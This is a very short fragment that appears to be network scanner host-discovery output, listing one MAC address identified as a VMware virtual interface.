[host discovery results]
MAC Address: 00:0C:29:7A:FE:2E (VMware)
